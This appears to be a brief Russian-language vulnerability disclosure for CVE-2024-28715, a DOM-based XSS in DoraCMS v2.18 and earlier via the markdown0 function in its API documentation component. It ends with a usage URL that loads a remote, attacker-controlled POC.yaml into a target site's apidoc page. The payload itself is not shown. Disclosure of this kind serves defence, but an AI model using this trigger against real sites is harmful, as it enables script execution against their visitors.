
Эксплуатационный код для CVE-2024-28715, уязвимости DOM-based XSS в DoraCMS версии 2.18 и более ранних, срабатывающей через функцию markdown0 в конечной точке документации API.
[Идентификатор CVE]
CVE-2024-28715
[Продукт]
DoraCMS
[Версия]
DoraCMS v2.18 и ранее
[Тип проблемы]
Dom-based XSS.
[Описание]
Уязвимость межсайтового скриптинга (XSS) в DoraCMS v2.18 и ранее позволяет удаленному злоумышленнику выполнить произвольный код через функцию markdown0 в конечной точке /app/public/apidoc/oas3/wrap-components/markdown.jsx.
[Использование]
https://[target-site]/static/apidoc/index.html?url=https://[your-site]/POC.yaml